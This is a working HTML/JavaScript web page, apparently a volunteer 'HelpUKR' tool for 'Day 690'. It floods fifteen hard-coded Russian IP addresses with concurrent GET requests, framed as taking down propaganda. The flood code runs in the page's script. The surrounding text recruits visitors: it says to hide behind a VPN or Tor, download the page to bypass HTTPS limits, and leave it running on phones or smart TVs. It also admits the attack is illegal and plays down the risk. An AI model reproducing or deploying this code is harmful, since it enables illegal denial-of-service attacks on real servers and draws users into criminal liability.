<!doctype html><head>
  <html lang="en">
  <meta charset="utf-8">
  <meta name="viewport" content="width=1024">
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <title>Day 690 flood</title>
  <link href="https://www.helpukr.xyz/bootstrap.helpukr.css" rel="stylesheet" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css">
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.min.js" crossorigin="anonymous"></script>
  <script src= "https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script type="text/javascript">
function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}
function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
</script>
</head>
  
  
  
<style>
  /* width */
  ::-webkit-scrollbar {
    width: 10px;
    overflow: auto;
    height: 0em;
  }
  /* Track */
  ::-webkit-scrollbar-track {
    background: #34a8eb;
  }
  /* Handle */
  ::-webkit-scrollbar-thumb {
    background: #63c6ff
    ;
  }
  /* Handle on hover */
  ::-webkit-scrollbar-thumb:hover {
    background: yellow;
  }
  .style10 {
    font-size: 9px;
    color: #FFFFFF;
  }
  </style>
    <script> 
      /* This method uses ipify's api to get the clients IP Address. 
      This method is completely free and no limitations of use. */ 
      $.getJSON("https://api.ipify.org?format=json", 
                      function(data) { 
        // userip element is where the IP will be displayed
        $("#userip").html(data.ip); 
      }) 
    </script>
    <style> 
      h6 {
      color:white;
      }
    </style>
      <style>
          body {
              padding: 0;
              margin: 0;
              font-family: Arial, sans-serif;
              background-color: #FFD600;
          }
          .title {
              margin: 3rem auto 3rem auto;
              text-align: center;
              color: #005BBC;
          }
          .intro .howto {
              background-color: #005BBC;
          }
          .intro .howto h3 {
              color: #FFD600;
              text-align: center;
              margin-top: 1rem;
          }
          .intro .howto p {
              color: white;
              text-align: justify;
          }
  
          .footer {
      color: #005BBC;
      margin-top: 2rem;
      text-align: center;
          }
          .desc{
              color:black;
              padding-top: 2rem;
              padding-bottom: 2rem;
              margin: 0 auto;
              width: 60%;
          }
          .desc h3 {
              text-align: center;
              color: #005BBC;
          }
          #stats h4 {
              font-size: 1.1em;
              text-decoration: underline;
              color: #005BBC;
              font-weight: 400;
          }
          table.status {
              margin-bottom: 10px;
          }
      .style1 {
    color: #CC0000;
    font-weight: bold;
  }
  .style6 {color: #FF6262}
      .style7 {font-size: 0.1px}
      .style9 {
    color: #FFD600;
    font-weight: bold;
    font-size: 18px;
  }
      .style10 {font-size: 24px}
      .style11 {
    font-size: 16px;
    color: #FFFFFF;
  } 
      .style13 {
    margin: 3rem auto 3rem auto;
    text-align: center;
    color: #FFD600;
    font-size: 24px;
    font-weight: bold;
  }
      .style14 {color: #FFFFFF}
      .style15 {color: #FFFF00}
      .style16 {color: #FF3300}
      .style17 {color: #FF6633}
      .style17 {color: #FF6633}
  .style21 {color: #B9DCFF}
      .style22 {color: #ECE3AA}
    table {
    border-color: #fffd9c;
  }
  </style>
  <body onLoad="MM_preloadImages('https://i.imgur.com/3E2WIia.png')">
      <div class="modal" id="HelpUKR-WarningBox" tabindex="-1" role="dialog" aria-labelledby="HelpUKR-WarningBoxLabel" aria-hidden="true" data-bs-backdrop="static" data-bs-keyboard="false">
      <div class="modal-dialog modal-dialog-centered" role="document">
      <div class="modal-content">
      <div class="modal-header" style=" padding-bottom: 4px; padding-top: 3px;padding-left: 3px;">
      <h5 id="HelpUKR-WarningBoxLabel" style=" margin-bottom: 0px;">
    <span class="modal-title style1"><img class="qIBnUc" src="https://i.imgur.com/kpcdmzu.png" draggable="false" width="50px" alt="UKR"> Warning: </span><span class="modal-title style6">Read before you continue.&nbsp;<span class="style16"><i>[</span><span class="style17"><b>Day 690</span></b><span class="style16">]</i></span></span></h5></div>
      <div class="modal-body" style=" padding-top: 5px; padding-bottom: 0px;">
      <p style=" margin-bottom: 0px;">As you’ll already be aware, DDoSin or participating in any kind of cyber-attack in general is illegal, and usually for good reason.</p>
  <hr style=" margin-top: 3px; margin-bottom: 3px;">
      <p style=" margin-bottom: 0px;">Click "Continue" if you have a VPN, Proxy, the Tor browser or your own secure connection &amp; wish to support Ukraine in taking down Russian propaganda and services aiding Putins invasion</p>
  <hr style=" margin-top: 3px; margin-bottom: 3px;">
      This works by sending GET requests to each targeted website. It’s like opening each website in a random sequence on your PC and re-requesting the data over and over, although the data is not saved or cached, Due to the way it work, It should be fair to say that your Internet service Provider (ISP) won’t be any more bothered about this than they would you browsing the internet, but its always best to stay safe when it comes to security.                                                                                                                                                                                                                                                           
  <hr style=" margin-top: 3px; margin-bottom: 3px;">
      
     <p style="
    margin-bottom: 0px;
"><span style="font-size:14px;"><u></u><strong>Todays message from the IT Army of Ukraine: </strong></span><br>
		<a href="https://lieber.westpoint.edu/recapping-cyber-war-lessons-russia-ukraine-conflict/">
		<table width="100%" border="0">
		  <tbody>
		    <tr></tr>
	      </tbody>
	    </table>
		
		<table width="100%" border="0">
		  <tbody>
		    <tr></tr>
	      </tbody>
	    </table>
		</a>
		<table width="100%" border="0">
		  <tbody>
		  <tr>If you haven't yet watched the&nbsp;<a href="https://youtu.be/eFL3PRYlElg?si=cLHIoEGHwuTijRDA" target="_blank" rel="nofollow">wonderful video about Ukrainian hackers on Sergey Peychev's channel</a>.<br>featuring our volunteers, don't miss it!<br>For the first time, we managed to make a truly exciting video about our and not only achievements, which are already inspiring many people to join the cyber resistance. The increase in the number of new devices that are jamming the enemy has increased sevenfold yesterday. Congratulations to everyone who is joining!<br>P.S. The bearded toxic in the middle is not ours )) Write your impressions of the video in the chat.</tr></tbody>
		</table>
<table width="100%" border="0">
		  </table>
	</a><span style="font-size:14px;"><u></u><strong>Additional message for newly added targets:&nbsp;&nbsp;<br></strong>
    &nbsp; &nbsp; &nbsp; To keep up with targets we're going to use the db1000n targets<br>
    &nbsp; &nbsp; &nbsp; direct from their GitHub repository.<br>
    &nbsp; &nbsp; &nbsp; These updates will be daily, so if the db1000n changes, it will<br>
    &nbsp; &nbsp; &nbsp; probably take a few hours longer for the change to make it here.
      </div>
      <div class="modal-footer">
      <button type="button" class="btn btn-secondary" onClick="window.location.href='https://www.helpukr.xyz'">Leave</button>
      <button type="button" class="btn btn-primary" data-dismiss="HelpUKR-WarningBoxLabel" onClick="togglePause(); myModal.toggle();">Continue</button></div></div></div></div><table width="100%" border="0" align="center" bgcolor="#005BBC">
        <tr>
          <td bgcolor="#004A9D"><div align="center">
            <table width="200" border="1" style="border-top-width: 0px;">
                <tbody><tr>
                  <td><table width="989" border="1" align="left" style="border-top-width: 0px;border-bottom-width: 0px;border-left-width: 0px;border-right-width: 0px;">
                    <tbody>
                      <tr>
                        <td width="239" bgcolor="#005BB7"><div align="right"><span class="style14"><strong> Info:</strong> Your Public IP Address is: </span></div></td>
                        <td width="175" bgcolor="#005BB7"><h6 id="userip" style="margin-bottom: 0px;">Loading..</h6></td>
                        <td width="553" bgcolor="#005BB7"><div align="right"><span class="style21">For privacy, download the Tor Browser:</span> <a href="https://www.torproject.org/download/" target="_blank" class="style22" rel="nofollow">https://www.torproject.org/download/</a> &nbsp; </div></td>
                      </tr>
                    </tbody>
                  </table></td>
                </tr>
              </tbody></table>
            <p class="style13" style="margin-top: 0px;margin-bottom: 0px;">Propaganda http(s) flood for <span class="style15">Day 690 </span>using targets from the IT Army of Ukraine.</p>
          </div></td>
        </tr><tr>
          <td bgcolor="#0057B7"><div align="center" class="style9 style10">
            <h3><u>Information about this tool.</u></h3>
          </div></td>
        </tr><tr>
          <td><table width="90%" border="0" align="center">
            <tr>
              <td align="center"><p class="style11">This tool is hosted via <a href="https://pages.github.com/" target="_blank" class="align-content-sm-between">GitHub Page</a>, You can download it for local use and customization <a href="https://raw.githubusercontent.com/helpukr/helpukr.github.io/main/day690.htm" target="_blank" class="style15">here</a>. A new page will be added for each day, with a new set of targets from the Ukrainian IT Army's telegram servers.</p>
                <p class="style11">All of the news in the Russian federation is fake and need to be shut down, we need as many people as possible to help. Just a tiny 1kbps of data could be the edge needed to take down a server hosting propaganda.<br>
                  <br>Just open this page and leave it running on your devices as long as possible, it will flood targets selected specifically for that day.<br>
                  Targets are chosen by an intelligence team who are always looking at what services are aiding Russia’s war,together we can pose a huge load on their infrastructure.</p>
            <details>
          <summary><span style="color: #ffff99;">Click Here for <b>FAQ</b> <i>(Questions & Answers)</i></span></summary>
                <p><table width="100%" border="0">
                  <tbody><tr>   
                    <td><hr style=" margin-top: 5px; margin-bottom: 5px; color: #FFFFFF"><p class="style11">FAQ:<br>
                      <span style="color: #ffff99;"><strong>Q)</strong></span> How can I use this in the tor browser if HTTPS overrides HTTP no matter what i try?<br>
                      <span style="color: #ffff99;"><strong>A)</strong></span> <em>Download the page for local use, it won't use any http/https protocols because those are used to request files from a web server, but using it locally (directly from your computer) bypasses the need and allows you to flood both HTTP and HTTPS from your TOR Browser's IP.</em></p>
                      <p class="style11"><span style="color: #ffff99;"><strong>Q)</strong></span> How can I see what's happening in more detail?<br>
                      <span style="color: #ffff99;"><strong>A)</strong></span> Redacted for security.</p>
                      <p class="style11"><span style="color: #ffff99;"><strong>Q)</strong></span> After so much time has passed, my browser/computer become very laggy and unresponsive or my browser crashes, how can I fix this?<br>
                      <span style="color: #ffff99;"><strong>A)</strong></span> Redacted for security.</p>
                      <p class="style11"><span style="color: #ffff99;"><strong>Q)</strong></span> Why are some of the requests having the same number error after a while?<br>
                        <span style="color: #ffff99;"><strong>A)</strong></span> This is likely caused by the IP of the VPN you're using has been blocked on their side, but it could also mean the site's just totally overloaded and cannot respond to any requests.<br>Also if you’re are using https:// in the address bar that would cause the http:// addresses to do the same</p></td>
                      </tr>
                  </tbody>
              </table></p>
            </details>
              <hr style=" margin-top: 5px; margin-bottom: 5px; color: #FFFFFF"></td>
            </tr>
          </table>
            <table width="613" border="0" align="center">
              <tr>
                <td width="608" height="155"><h3 align="center" class="style14">Session Status</h3>
                  <p align="center" class="style14" style="margin-bottom: 0px;padding-bottom: 0px;">Below is a log of sites that ether responded with errors or failed to respond at all.<br>
                    It’s normal for this number to count up slow or fast and can often change.<br>
                    If a lot of services are overloaded the numbers will go fast, else they’ll go slower.<br>
                    If all requests are the same as all errors on some sites, it most likely means that the<br>
                    site operator has banned the IP you’re using.<br>
                  </p></td>
              </tr>
            </table>
        </td>
        </tr>
      </table>
  <div class="desc text-center" style=" padding-top: 4px;">
    <p align="center" class="style7" style=" margin-bottom: 0px;">Total number of requests: <span id="totalrequests">0</span></p>
    <p>So far <span id="totalerrors"><em>zero</em></span> sites have responded with errors</p>
  <button type="button" class="btn btn-primary" onClick="togglePause();" style=" padding-left: 32px; padding-right: 32px; padding-top: 8px; padding-bottom: 8px;">Resume</button></div>
  <div id="stats" class="container">
    <div class="row">
    </div>
  </div>
  <p class="footer">This website is an easy to run solution to flooding Russian propaganda via any internet capable device with a browser.<br>
        For example you can walk around town shopping and flood Russian propaganda from a phone in your pocket.<br>
        It can even be used via the browser app on a Smart TV in the background whilst you watch TV.<br>
        With your help you can convince a Russian to rebel agents the war by making them<br>
        look elsewhere for news, remember, Nothing you do is too little!<br>
        Glory to Ukraine, Glory to the hero’s.<br><br>
      <center>
        <div id="betabox" style="text-align: center"><span class="footer"><strong><span style="color:#003697"><em><u>Estimate</u>:</em></span></strong> data requested from servers via GET: <span class="number-counter" data-count-from="0" data-count-to="1000000000000" data-count-speed="0.03">0</span>MB (MegaBytes)</span></div></center>
  <style>#betabox {
    padding: 1px ;
    border-top: 1px solid #3498db;
    border-right: 1px solid #3498db;
    background-color: #FFE248;
    line-height: 110%;
    border-left: 1px solid #3498db;
    align-content: center;
    align-self: 4px ;
    width: 570px ;
  }</style>
  <script>
          // target list
          var urls = [
          //Targets from DB1000n Github Update
		    'http://79.164.33.48',
		    'http://87.240.44.167',
		    'http://87.240.11.163',
		    'http://87.240.50.222',
		    'http://212.13.104.122',
		    'http://87.240.42.95',
		    'http://87.240.62.42',
		    'http://212.13.117.147',
		    'http://87.240.54.77',
		    'http://87.240.40.158',
		    'http://87.240.62.152',
		    'https://79.164.39.51',
		    'https://79.164.38.199',
		    'https://212.13.96.142',
		    'https://212.15.100.171',
          ];
          // initialize variables
          var targets = urls.reduce((o, key) => ({ ...o, [key]: {number_of_requests: 0, number_of_errored_responses: 0}}), {})
          var statRow = document.querySelector("#stats > .row");
          var myModal = new bootstrap.Modal(document.getElementById('HelpUKR-WarningBox'), {});
          var CONCURRENCY_LIMIT = 200;
          var queue = [];
          var attack = false;
          var totalrequests = 0;
          var totalerrors = 0;
          function togglePause () {
              if (attack) {
                  attack = false;
                  document.querySelector("div.desc .btn").innerText = "Resume";
              } else {
                  attack = true;
                  document.querySelector("div.desc .btn").innerText = "Pause";
                  for (var i=0; i<urls.length; i++) {
                      flood(i);
                  }
              }
          }
          async function fetchWithTimeout(resource, options) {
              const controller = new AbortController();
              const id = setTimeout(() => controller.abort(), options.timeout);
              return fetch(resource, {
                  signal: controller.signal,
                  mode: 'no-cors'
              }).then((response) => {
                  clearTimeout(id);
                  return response;
              }).catch((error) => {
                  clearTimeout(id);
                  throw error;
              });
          }
          async function sleep(ms) {
              return new Promise(r => setTimeout(r, ms));
          }         
          async function flood(n) {
              const url = urls[n];
              const target = targets[url];
              while (attack) {
                  if (queue.length > CONCURRENCY_LIMIT) {
                      await queue.shift();
                  }
                  queue.push(
                      fetchWithTimeout(url, { timeout: 2000 })
                          .catch((error) => {
                              if (error.code === 20 /* ABORT */) {
                                  return;
                              }
                              target.number_of_errored_responses++;
                              target.error_message = error.message;
                              totalerrors++;
                          })
                          .then((response) => {
                              if (response && !response.ok) {
                                  target.number_of_errored_responses++;
                                  target.error_message = response.statusText;
                                  totalerrors++;
                              }
                              target.number_of_requests++;
                          })
                          .finally(() => updateTargetDisplay(n))
                  );
                  await sleep(1);
              }
          }
          // Update data for target n
          function updateTargetDisplay(n) {
              var url = urls[n];
              var {number_of_requests, number_of_errored_responses} = targets[url];
              var requests_cell = document.querySelector(`#target${n} .requests`);
              var errors_cell = document.querySelector(`#target${n} .errors`);
              requests_cell.innerText = number_of_requests;
              errors_cell.innerText = number_of_errored_responses;
              document.querySelector("#totalrequests").innerText = totalrequests;
              document.querySelector("#totalerrors").innerText = totalerrors;
          }
          // Shuffle array order before starting
          for (let i = urls.length - 1; i > 0; i--) {
              const j = Math.floor(Math.random() * (i + 1));
              [urls[i], urls[j]] = [urls[j], urls[i]];
          }
          // Create div for each target
          for (var i=0; i<urls.length; i++) {
              statRow.innerHTML += `
                  <div class="col-lg-3 col-md-4 col-sm-6" id="target${i}">
                    <h7>${"<u><i>Hidden Target:</i></u>"}</h7>
                      <table class='status'>
                        <tr><td>requests:</td><td class="requests">0</td></tr>
                        </tr><td>errors:</td><td class="errors">0</td></tr>
                      </table>
                    </div>
              `;
          }
          // Show warning window
          myModal.toggle();
    window.dataLayer = window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());
    gtag('config', 'UA-85513613-1');
  </script>
  <script>
  // BETA plugin for estimated requested data
  (function($) {
    $.fn.countTo = function(options) {
      return this.each(function() {
        //-- Arrange
        var FRAME_RATE = 60; // Predefine default frame rate to be 60fps
        var $el = $(this);
        var countFrom = parseInt($el.attr('data-count-from'));
        var countTo = parseInt($el.attr('data-count-to'));
        var countSpeed = $el.attr('data-count-speed'); // Number increment per second
  
        //-- Action
        var rafId;
        var increment;
        var currentCount = countFrom;
        var countAction = function() {              // Self looping local function via requestAnimationFrame
          if(currentCount < countTo) {              // Perform number incremeant
            $el.text(Math.floor(currentCount));     // Update HTML display
            increment = countSpeed / FRAME_RATE;    // Calculate increment step
            currentCount += increment;              // Increment counter
            rafId = requestAnimationFrame(countAction);
          } else {                                  // Terminate animation once it reaches the target count number
            $el.text(countTo);                      // Set to the final value before everything stops
            //cancelAnimationFrame(rafId);
          }
        };
        rafId = requestAnimationFrame(countAction); // Initiates the looping function
      });
    };
  }(jQuery));
  
  //-- Executing
  $('.number-counter').countTo();
  </script>
  </html>